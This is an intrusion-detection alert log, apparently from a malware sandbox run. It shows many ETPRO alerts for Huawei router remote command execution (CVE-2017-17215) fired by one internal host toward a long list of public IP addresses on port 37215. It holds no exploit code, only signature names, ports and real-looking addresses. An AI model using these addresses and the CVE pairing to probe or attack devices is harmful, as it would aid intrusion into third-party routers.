                                                    07/10/24-08:27:08.369080TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4619837215192.168.2.14197.244.147.109
                                                    07/10/24-08:27:07.356358TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5358637215192.168.2.1441.32.228.217
                                                    07/10/24-08:26:28.896457TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3970437215192.168.2.14197.134.213.78
                                                    07/10/24-08:27:22.802348TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5776037215192.168.2.1472.210.8.108
                                                    07/10/24-08:27:24.981965TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5760037215192.168.2.14137.118.209.240
                                                    07/10/24-08:27:22.539034TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5369037215192.168.2.14120.20.39.179
                                                    07/10/24-08:27:14.875124TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4532637215192.168.2.1441.132.222.247
                                                    07/10/24-08:27:10.772266TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5726637215192.168.2.1441.235.33.38
                                                    07/10/24-08:27:17.070374TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4873237215192.168.2.14197.30.227.162
                                                    07/10/24-08:26:18.003216TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4222637215192.168.2.14157.18.110.174
                                                    07/10/24-08:27:23.782637TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3340637215192.168.2.14157.253.108.212
                                                    07/10/24-08:26:43.773562TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5785637215192.168.2.14157.212.155.83
                                                    07/10/24-08:27:13.980832TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5348037215192.168.2.14197.212.32.20
                                                    07/10/24-08:26:22.295095TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5485837215192.168.2.14157.84.240.170
                                                    07/10/24-08:26:42.359553TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3660437215192.168.2.14157.99.100.170
                                                    07/10/24-08:26:36.427359TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5499837215192.168.2.14197.217.239.105
                                                    07/10/24-08:27:05.108007TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4797637215192.168.2.14157.19.132.22
                                                    07/10/24-08:27:10.600336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5219237215192.168.2.14157.186.86.10
                                                    07/10/24-08:27:19.326133TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3382237215192.168.2.1441.199.103.145
                                                    07/10/24-08:27:22.527598TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4218237215192.168.2.14197.99.222.252
                                                    07/10/24-08:26:53.161125TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3852237215192.168.2.1475.91.255.77
                                                    07/10/24-08:27:13.872698TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4856437215192.168.2.1477.180.245.98
                                                    07/10/24-08:27:28.162130TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3496437215192.168.2.14205.52.159.19
                                                    07/10/24-08:27:33.865886TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5841237215192.168.2.1441.241.231.96
                                                    07/10/24-08:26:42.341991TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4637637215192.168.2.14157.78.86.190
                                                    07/10/24-08:26:29.752845TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5834037215192.168.2.14197.40.111.180
                                                    07/10/24-08:27:23.937541TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3649037215192.168.2.14173.188.41.226
                                                    07/10/24-08:26:22.289116TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4409237215192.168.2.1441.41.159.84
                                                    07/10/24-08:27:33.934356TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4539437215192.168.2.1441.177.230.41
                                                    07/10/24-08:27:03.016344TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3728637215192.168.2.1441.163.47.203
                                                    07/10/24-08:26:59.566054TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5041037215192.168.2.1441.147.233.150
                                                    07/10/24-08:26:34.249351TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5162237215192.168.2.14157.254.47.112
                                                    07/10/24-08:27:24.912875TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5357237215192.168.2.1441.113.167.99
                                                    07/10/24-08:26:41.449225TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5808237215192.168.2.14157.90.230.165
                                                    07/10/24-08:26:29.762574TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5032037215192.168.2.1442.219.22.8
                                                    07/10/24-08:26:28.650487TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5934437215192.168.2.14197.31.224.73
                                                    07/10/24-08:27:22.909155TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4505237215192.168.2.1441.60.77.203
                                                    07/10/24-08:26:49.837905TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3675837215192.168.2.14197.219.45.213
                                                    07/10/24-08:27:20.425119TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4739237215192.168.2.1441.172.51.102
                                                    07/10/24-08:27:02.706462TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4364637215192.168.2.1441.19.149.4
                                                    07/10/24-08:27:27.136421TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3499437215192.168.2.14157.124.29.112
                                                    07/10/24-08:26:34.216588TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4995237215192.168.2.14197.56.86.151
                                                    07/10/24-08:26:38.590272TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3747437215192.168.2.1441.201.184.97
                                                    07/10/24-08:26:43.821478TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3867837215192.168.2.14197.237.248.246
                                                    07/10/24-08:27:32.622738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5072037215192.168.2.14197.225.49.39
                                                    07/10/24-08:27:32.621614TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3976837215192.168.2.14157.64.149.14
                                                    07/10/24-08:27:32.489604TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4803037215192.168.2.14120.63.229.28
                                                    07/10/24-08:27:33.758837TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5220637215192.168.2.1435.151.241.207
                                                    07/10/24-08:26:59.826024TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5415637215192.168.2.1441.145.3.46
                                                    07/10/24-08:26:29.790655TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5738037215192.168.2.1441.59.54.248
                                                    07/10/24-08:27:22.564607TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5304037215192.168.2.1441.0.192.217
                                                    07/10/24-08:26:17.960576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5186237215192.168.2.14197.66.124.152
                                                    07/10/24-08:26:28.784417TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3756437215192.168.2.1441.230.104.58
                                                    07/10/24-08:27:02.868135TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4854637215192.168.2.1483.200.181.91
                                                    07/10/24-08:26:43.764086TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3888837215192.168.2.1441.89.100.158
                                                    07/10/24-08:27:30.426359TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5280437215192.168.2.14157.153.184.104
                                                    07/10/24-08:27:22.535302TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5817437215192.168.2.14157.231.136.55
                                                    07/10/24-08:27:10.621060TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4309637215192.168.2.1441.174.190.229
                                                    07/10/24-08:27:03.020823TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3366637215192.168.2.14197.188.200.138
                                                    07/10/24-08:27:22.839060TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4290437215192.168.2.14197.251.189.90
                                                    07/10/24-08:26:15.867590TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4681037215192.168.2.14157.212.230.10
                                                    07/10/24-08:26:53.202392TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4654037215192.168.2.1441.113.253.156
                                                    07/10/24-08:26:43.650681TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3524637215192.168.2.14197.98.209.214
                                                    07/10/24-08:26:41.491692TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4144837215192.168.2.14197.70.254.155
                                                    07/10/24-08:26:55.364667TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4755237215192.168.2.14157.39.203.91
                                                    07/10/24-08:26:38.536565TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4927037215192.168.2.14157.27.205.235
                                                    07/10/24-08:27:33.897517TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3937837215192.168.2.14207.164.83.110
                                                    07/10/24-08:26:47.992433TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4478837215192.168.2.14150.57.67.212
                                                    07/10/24-08:26:55.278006TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4972437215192.168.2.14197.4.73.108
                                                    07/10/24-08:26:41.343465TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3571637215192.168.2.14196.210.142.217
                                                    07/10/24-08:26:25.464984TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5981437215192.168.2.1441.255.111.58
                                                    07/10/24-08:27:20.506153TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5484637215192.168.2.1441.86.169.102
                                                    07/10/24-08:26:13.778157TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4302237215192.168.2.1441.45.230.71
                                                    07/10/24-08:26:25.435819TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5466637215192.168.2.14157.179.210.140
                                                    07/10/24-08:27:07.355294TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6016237215192.168.2.14157.56.130.3
                                                    07/10/24-08:26:14.775624TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3372837215192.168.2.14157.151.54.36
                                                    07/10/24-08:26:26.589872TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5704037215192.168.2.14157.120.19.114
                                                    07/10/24-08:26:41.514573TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3338037215192.168.2.14197.70.234.236
                                                    07/10/24-08:26:36.327506TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4225237215192.168.2.1441.232.128.115
                                                    07/10/24-08:26:59.528584TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5375837215192.168.2.14197.53.29.158
                                                    07/10/24-08:27:05.195980TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4952437215192.168.2.14157.234.29.234
                                                    07/10/24-08:27:10.609606TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3864837215192.168.2.14157.56.226.148
                                                    07/10/24-08:26:59.711172TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4164837215192.168.2.1441.16.109.134
                                                    07/10/24-08:26:42.387437TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4505637215192.168.2.1478.129.55.138
                                                    07/10/24-08:26:52.029476TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5077837215192.168.2.14197.15.116.45
                                                    07/10/24-08:26:33.262115TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3477237215192.168.2.1493.253.131.4
                                                    07/10/24-08:26:53.171769TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5064237215192.168.2.14197.155.46.167
                                                    07/10/24-08:26:31.061341TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5454837215192.168.2.14197.146.168.131
                                                    07/10/24-08:26:41.535361TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4582637215192.168.2.14157.24.159.244
                                                    07/10/24-08:26:53.247062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4934437215192.168.2.14157.35.174.216
                                                    07/10/24-08:26:59.648560TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4860837215192.168.2.1441.5.130.17
                                                    07/10/24-08:27:19.306995TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5707437215192.168.2.14197.104.159.239
                                                    07/10/24-08:27:05.140242TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5356637215192.168.2.14197.47.20.169
                                                    07/10/24-08:27:08.422156TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3922837215192.168.2.1441.199.154.246
                                                    07/10/24-08:27:23.899186TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5329637215192.168.2.14197.45.57.159
                                                    07/10/24-08:26:29.875451TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4152237215192.168.2.1441.119.51.152
                                                    07/10/24-08:26:49.828645TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5890437215192.168.2.14157.4.168.103
                                                    07/10/24-08:26:28.774897TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3684837215192.168.2.1441.237.125.74
                                                    07/10/24-08:26:38.627693TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3675837215192.168.2.14117.120.74.62
                                                    07/10/24-08:26:18.037759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4110837215192.168.2.14197.84.148.35
                                                    07/10/24-08:27:30.468804TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3818837215192.168.2.14157.200.34.35
                                                    07/10/24-08:26:33.244914TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4812437215192.168.2.14157.143.71.109
                                                    07/10/24-08:26:59.751989TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5233837215192.168.2.14176.204.172.91
                                                    07/10/24-08:27:31.448205TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3344037215192.168.2.1441.40.7.225
                                                    07/10/24-08:26:55.377944TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5631237215192.168.2.14174.201.15.137
                                                    07/10/24-08:26:49.900160TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3735637215192.168.2.1487.238.61.212
                                                    07/10/24-08:27:32.603440TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5360437215192.168.2.1441.56.76.57
                                                    07/10/24-08:27:27.096599TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5753837215192.168.2.14157.99.58.20
                                                    07/10/24-08:26:14.814573TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4328637215192.168.2.14157.70.238.225
                                                    07/10/24-08:26:42.418339TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5944237215192.168.2.14108.207.208.113
                                                    07/10/24-08:26:28.861784TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5610037215192.168.2.14194.67.111.5
                                                    07/10/24-08:27:30.549258TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5076237215192.168.2.1441.27.155.120
                                                    07/10/24-08:27:05.183998TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5601437215192.168.2.14157.40.208.62
                                                    07/10/24-08:26:34.264722TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4466437215192.168.2.1441.96.214.244
                                                    07/10/24-08:26:43.924330TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3768437215192.168.2.14157.117.23.123
                                                    07/10/24-08:27:32.587332TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4757037215192.168.2.1441.247.104.34
                                                    07/10/24-08:27:22.482500TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3947237215192.168.2.14197.41.104.133
                                                    07/10/24-08:26:53.177713TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5852037215192.168.2.1451.158.52.144
                                                    07/10/24-08:26:36.416571TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4575637215192.168.2.14209.250.204.124
                                                    07/10/24-08:26:41.447819TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4474037215192.168.2.1427.68.58.208
                                                    07/10/24-08:26:31.069203TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3681237215192.168.2.1441.211.231.142
                                                    07/10/24-08:26:38.592114TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4336837215192.168.2.14197.21.28.75
                                                    07/10/24-08:27:32.588924TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5848837215192.168.2.14197.78.94.91
                                                    07/10/24-08:27:19.236089TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3388637215192.168.2.1447.154.145.123
                                                    07/10/24-08:26:55.297607TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3792237215192.168.2.14157.133.119.219
                                                    07/10/24-08:26:45.639847TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4878237215192.168.2.1448.104.197.188
                                                    07/10/24-08:26:23.293850TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3709037215192.168.2.1441.229.94.141
                                                    07/10/24-08:26:53.129379TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3576237215192.168.2.14197.193.139.254
                                                    07/10/24-08:26:55.297607TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3734637215192.168.2.1441.245.162.57
                                                    07/10/24-08:26:33.161140TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5572037215192.168.2.14157.145.40.87
                                                    07/10/24-08:26:25.456232TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3689037215192.168.2.14138.170.140.255
                                                    07/10/24-08:26:28.776724TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6055437215192.168.2.14204.32.250.17
                                                    07/10/24-08:27:33.854210TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3468237215192.168.2.14157.226.153.34
                                                    07/10/24-08:27:34.131250TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4963237215192.168.2.14197.58.45.192
                                                    07/10/24-08:26:15.819224TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3790837215192.168.2.1473.69.77.111
                                                    07/10/24-08:27:27.051351TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4834437215192.168.2.14157.165.217.65
                                                    07/10/24-08:27:33.821123TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5904237215192.168.2.14197.135.211.156
                                                    07/10/24-08:26:59.826024TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4538237215192.168.2.14197.167.207.132
                                                    07/10/24-08:27:22.849786TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5901037215192.168.2.14197.73.42.204
                                                    07/10/24-08:26:38.601191TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5348637215192.168.2.14157.39.18.103
                                                    07/10/24-08:26:43.718620TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4246637215192.168.2.14197.75.186.20
                                                    07/10/24-08:27:05.148384TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4538437215192.168.2.1441.40.58.65
                                                    07/10/24-08:27:07.259693TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3363037215192.168.2.14197.156.170.43
                                                    07/10/24-08:27:13.896950TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4389837215192.168.2.14157.133.2.56
                                                    07/10/24-08:27:23.870319TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5331237215192.168.2.14157.11.140.202
                                                    07/10/24-08:26:36.333878TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5330037215192.168.2.14157.149.247.12
                                                    07/10/24-08:27:33.862299TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5431237215192.168.2.14197.147.106.134
                                                    07/10/24-08:26:42.385136TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4733037215192.168.2.1489.138.26.120
                                                    07/10/24-08:27:03.019340TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5698037215192.168.2.1441.211.196.90
                                                    07/10/24-08:26:11.112996TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4354637215192.168.2.14197.174.73.168
                                                    07/10/24-08:26:43.778762TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3995037215192.168.2.1441.148.118.183
                                                    07/10/24-08:26:55.278007TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4540437215192.168.2.14157.115.253.57
                                                    07/10/24-08:26:55.373559TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3428037215192.168.2.1466.14.79.15
                                                    07/10/24-08:27:24.867570TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5430237215192.168.2.1441.69.157.51
                                                    07/10/24-08:26:33.245914TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3426437215192.168.2.1441.243.146.59
                                                    07/10/24-08:26:41.283034TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3571637215192.168.2.14200.102.212.73
                                                    07/10/24-08:26:42.370410TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4676637215192.168.2.1441.189.217.22
                                                    07/10/24-08:27:19.302695TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4758437215192.168.2.1492.246.87.221
                                                    07/10/24-08:27:08.292771TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3908637215192.168.2.1441.242.97.165
                                                    07/10/24-08:27:17.039425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4855437215192.168.2.1441.7.86.93
                                                    07/10/24-08:27:23.937541TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3448037215192.168.2.14221.180.237.192
                                                    07/10/24-08:26:53.181410TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3846837215192.168.2.1441.179.96.144
                                                    07/10/24-08:26:25.469425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5415237215192.168.2.1441.143.67.29
                                                    07/10/24-08:26:55.386958TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3359637215192.168.2.1441.224.173.0
                                                    07/10/24-08:26:57.632458TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3761637215192.168.2.1476.130.200.1
                                                    07/10/24-08:26:26.563571TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4202637215192.168.2.14197.255.125.69
                                                    07/10/24-08:26:17.992785TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4292637215192.168.2.1441.80.228.39
                                                    07/10/24-08:26:25.429135TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4874037215192.168.2.14197.168.201.129
                                                    07/10/24-08:27:20.494991TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3737637215192.168.2.14157.210.102.135
                                                    07/10/24-08:27:27.151316TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4872837215192.168.2.14197.32.189.201
                                                    07/10/24-08:26:22.224189TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3770237215192.168.2.14197.253.187.73
                                                    07/10/24-08:26:31.110610TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5944637215192.168.2.14157.37.233.180
                                                    07/10/24-08:26:42.379433TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4593637215192.168.2.14197.133.132.134
                                                    07/10/24-08:27:23.853234TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4744437215192.168.2.14157.151.193.81
                                                    07/10/24-08:26:45.622921TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4273837215192.168.2.1492.54.93.37
                                                    07/10/24-08:26:49.844556TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5240637215192.168.2.1492.64.3.23
                                                    07/10/24-08:27:08.383966TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4578237215192.168.2.14157.136.243.200
                                                    07/10/24-08:26:17.974548TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4097637215192.168.2.14157.25.18.76
                                                    07/10/24-08:26:20.113907TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4014037215192.168.2.14101.127.209.78
                                                    07/10/24-08:26:28.882504TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4708237215192.168.2.14157.94.172.30
                                                    07/10/24-08:27:07.369719TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4670637215192.168.2.1441.28.22.216
                                                    07/10/24-08:27:05.220771TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4883437215192.168.2.14129.47.5.97
                                                    07/10/24-08:26:22.275734TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3858837215192.168.2.14157.15.30.224
                                                    07/10/24-08:26:45.633104TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5770237215192.168.2.14197.122.192.5
                                                    07/10/24-08:26:36.340754TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3327037215192.168.2.14135.177.94.174
                                                    07/10/24-08:26:42.392755TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5742237215192.168.2.14197.92.255.180
